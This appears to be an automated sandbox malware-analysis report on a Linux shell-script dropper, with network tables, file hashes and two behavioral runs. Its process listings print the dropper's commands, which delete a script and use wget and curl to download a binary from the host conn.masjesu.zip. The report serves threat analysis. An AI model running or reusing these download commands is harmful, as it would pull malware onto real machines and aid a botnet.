| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
Files
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-18 03:08
Reported
2024-10-18 03:11
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
128s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh
[/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 151.101.129.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-18 03:08
Reported
2024-10-18 03:11
Platform
debian9-armhf-20240611-en
Max time kernel
148s
Max time network
17s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh
[/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |